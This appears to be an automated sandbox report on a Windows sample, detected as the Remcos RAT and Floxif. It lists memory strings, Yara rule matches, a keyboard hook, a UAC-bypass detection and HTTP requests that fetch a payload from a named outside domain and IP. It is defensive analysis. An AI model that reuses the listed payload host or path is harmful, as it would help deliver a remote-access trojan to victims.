                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.422250057.0000000002F44000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.422202761.0000000002F7F000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.422437505.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.422677307.0000000004E68000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.422159926.0000000002F7F000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.422595078.0000000004E68000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.422700357.0000000004E68000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.421759155.0000000002F47000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.postsignum.cz/crl/psrootqca2.crl02
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rcsc.lt/repository0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.res://ieframe.dll/MonitoringEnableFeeds.htmres://ieframe.dll/WebPreviewLoading.htmres://i
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sk.ee/cps/0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssc.lt/cps03
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.suscerte.gob.ve/dpc0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.suscerte.gob.ve/lcr0#
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yandex.com/favicon.icoYandex
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.postsignum.cz/crl/psrootqca2.crl01
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s/%s/%sendcahttps://%s.pinrules.crt/%sRetrieveValidatestaple:OcspGetOcspPostOcspFailoverExp
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://./://url%lu.bmp.png$
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://./key/plist/dictdictarrayTitleBookmarksBarBookmarksMenuURIDictionary
                        Source: 0vJrK0NCd1.exe, 00000000.00000002.469716889.000000000501D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://balkancelikdovme.com/work/Elpuxpkilck
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eca.hinet.net/repository0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://repository.luxtrust.lu0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://suggest.yandex.kz/suggest-ff.cgi?srv=ie11&part=
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://suggest.yandex.ua/suggest-ff.cgi?srv=ie11&part=
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.certicamara.com/marco-legal0Z
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/AC/ACTAS/789230
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/address/)1(0&
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/s?tn=80035161_2_dg&wd=
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.browserchoice.eu%s
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.haosou.com/s?src=win10&ie=utf-8&q=
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.381746840.000000000341A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.modern.ie/Umbraco/Api/CompatIssueApi/PostCompatIssue
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.381746840.000000000341A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.modern.ie/Umbraco/Api/CompatIssueApi/PostCompatIssue?version=2
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.381746840.000000000341A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.modern.ie/umbraco/api/readingviewissues/postreadingviewissue
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.381746840.000000000341A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.cn/spartan/ientp?locale%3D%25s%26market%3D%25s%26enableregulatorypsm%3D%25d%26enable
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com&pc=%shttps://www.msn.cn&pc=Z
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.381746840.000000000341A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/ientp?locale%3D%25s%26market%3D%25s%26enableregulatorypsm%3D%25d%26enabl
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.netlock.hu/docs/
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.netlock.net/docs
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sogou.com/tx?hdq=sogou-wsse-6abba5d8ab1f4f32&query=
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
                        Source: unknownDNS traffic detected: queries for: balkancelikdovme.com
                        Source: global trafficHTTP traffic detected: GET /work/Elpuxpkilck HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
                        Source: global trafficHTTP traffic detected: GET /work/Elpuxpkilck HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
                        Source: global trafficHTTP traffic detected: GET /work/Elpuxpkilck HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: jp.ask.comit.bing.combr.bing.comask.comcn.bing.comgoogle.com.brgoogle.com.trbing.co.ukbing.co.ingoogle.com.mxgoogle.com.hkgoogle.com.augoogle.com.argoogle.co.jpgoogle.co.ingoogle.comgoogle.co.ukgoogle.itgoogle.esgoogle.frgoogle.deyandex.ruuk.search.yahoo.comgoogle.cagoogle.nlsearch.yahoo.comsearch.yahoo.co.jpfr.search.yahoo.comtw.search.yahoo.comdaum.net10{startIndex{searchTerms{count{outputEncodingUTF-8{startPage{language{ie:maxwidth{ie:sectionheight{inputEncoding{referrer:source{ie:rowheightframeimdockedimtilelargelargeimmersiveimtilesmallhttp://www.linksrow_onecolumnlinksrow_twocolumnsulvfilteredimagetilemetricsulvimagetilemetricsulvmetricsrowsearchrowsuggestionsrow_onecolumnulvsuggestionsControl_PressedControl_HotControl_Enabled0 equals www.yahoo.com (Yahoo)
                        Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.3:49727 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.3:49736 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.3:49737 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Installs a global keyboard hook
                        Source: C:\Windows\SysWOW64\colorcpl.exeWindows user hook set: 0 keyboard low level C:\Windows\SysWOW64\colorcpl.exeJump to behavior
                        Source: Yara matchFile source: 0.2.0vJrK0NCd1.exe.10030000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000003.369676506.0000000002E63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 0vJrK0NCd1.exe PID: 6460, type: MEMORYSTR
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.370004681.00000000029B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DirectDrawCreateEx Callout.memstr_51aee523-7
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.369676506.0000000002E63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_7f63255d-2

                        E-Banking Fraud

                        barindex
                        Yara detected Remcos RAT
                        Source: Yara matchFile source: 35.2.SndVol.exe.3300000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.2.colorcpl.exe.2b50000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.0vJrK0NCd1.exe.10030000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.SndVol.exe.3300000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.2.colorcpl.exe.2b50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000026.00000002.564309116.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.532520297.0000000000487000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000002.637978823.0000000014C28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 0vJrK0NCd1.exe PID: 6460, type: MEMORYSTR

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 35.2.SndVol.exe.3300000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 35.2.SndVol.exe.3300000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 35.2.SndVol.exe.3300000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 29.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 29.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 29.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 38.2.colorcpl.exe.2b50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 38.2.colorcpl.exe.2b50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 38.2.colorcpl.exe.2b50000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 29.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 29.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 29.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 0.2.0vJrK0NCd1.exe.10030000.8.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0.2.0vJrK0NCd1.exe.10030000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 0.2.0vJrK0NCd1.exe.10000000.7.unpack, type: UNPACKEDPEMatched rule: Detects FloodFix Author: ditekSHen
                        Source: 0.2.0vJrK0NCd1.exe.10000000.7.unpack, type: UNPACKEDPEMatched rule: Detects Floxif Malware Author: Florian Roth
                        Source: 35.2.SndVol.exe.3300000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 35.2.SndVol.exe.3300000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 35.2.SndVol.exe.3300000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 0.2.0vJrK0NCd1.exe.2899224.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects FloodFix Author: ditekSHen
                        Source: 0.2.0vJrK0NCd1.exe.2899224.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Floxif Malware Author: Florian Roth
                        Source: 38.2.colorcpl.exe.2b50000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 38.2.colorcpl.exe.2b50000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 38.2.colorcpl.exe.2b50000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: Process Memory Space: 0vJrK0NCd1.exe PID: 6460, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: C:\Program Files\Common Files\system\symsrv.dll, type: DROPPEDMatched rule: Detects FloodFix Author: ditekSHen
                        Source: C:\Program Files\Common Files\system\symsrv.dll, type: DROPPEDMatched rule: Detects Floxif Malware Author: Florian Roth
                        Source: C:\Program Files (x86)\eTDdgXlyKliyxvptonffOcjuSNyaDmlKRZHGbQGKEUWyXCTW\kbTpwNGCTopuOamSxeKXoFxnyEswVm.exe.tmp, type: DROPPEDMatched rule: Malware - Floxif Author: Florian Roth
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38CC00_3_04E38CC0
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38CC00_3_04E38CC0
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38CC00_3_04E38CC0
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38D2C0_3_04E38D2C
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38D2C0_3_04E38D2C
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38D2C0_3_04E38D2C
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38D340_3_04E38D34
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38D340_3_04E38D34
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38D340_3_04E38D34
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38D3C0_3_04E38D3C
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38D3C0_3_04E38D3C
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38D3C0_3_04E38D3C
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E35A1C0_3_04E35A1C
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E39B3A0_3_04E39B3A
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E39B3A0_3_04E39B3A
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E39B3A0_3_04E39B3A
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38CC00_3_04E38CC0
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38CC00_3_04E38CC0
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38CC00_3_04E38CC0
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38D2C0_3_04E38D2C
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38D2C0_3_04E38D2C
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38D2C0_3_04E38D2C
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38D340_3_04E38D34
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38D340_3_04E38D34
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38D340_3_04E38D34
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38D3C0_3_04E38D3C
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38D3C0_3_04E38D3C
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38D3C0_3_04E38D3C
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E35A1C0_3_04E35A1C
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E39B3A0_3_04E39B3A
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E39B3A0_3_04E39B3A
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E39B3A0_3_04E39B3A
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38CC00_3_04E38CC0
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38CC00_3_04E38CC0
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38CC00_3_04E38CC0
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38D2C0_3_04E38D2C
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38D2C0_3_04E38D2C
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38D2C0_3_04E38D2C
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38D340_3_04E38D34
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38D340_3_04E38D34
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38D340_3_04E38D34
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38D3C0_3_04E38D3C
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38D3C0_3_04E38D3C
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E38D3C0_3_04E38D3C
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E35A1C0_3_04E35A1C
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E39B3A0_3_04E39B3A
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E39B3A0_3_04E39B3A
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E39B3A0_3_04E39B3A
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E3DD740_3_04E3DD74
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E3DD740_3_04E3DD74
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E3DD740_3_04E3DD74
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: ?????.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: system.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: ??l.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: ??l.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: ??l.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: ??l.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: ??l.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: ??l.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeSection loaded: am.dllJump to behavior
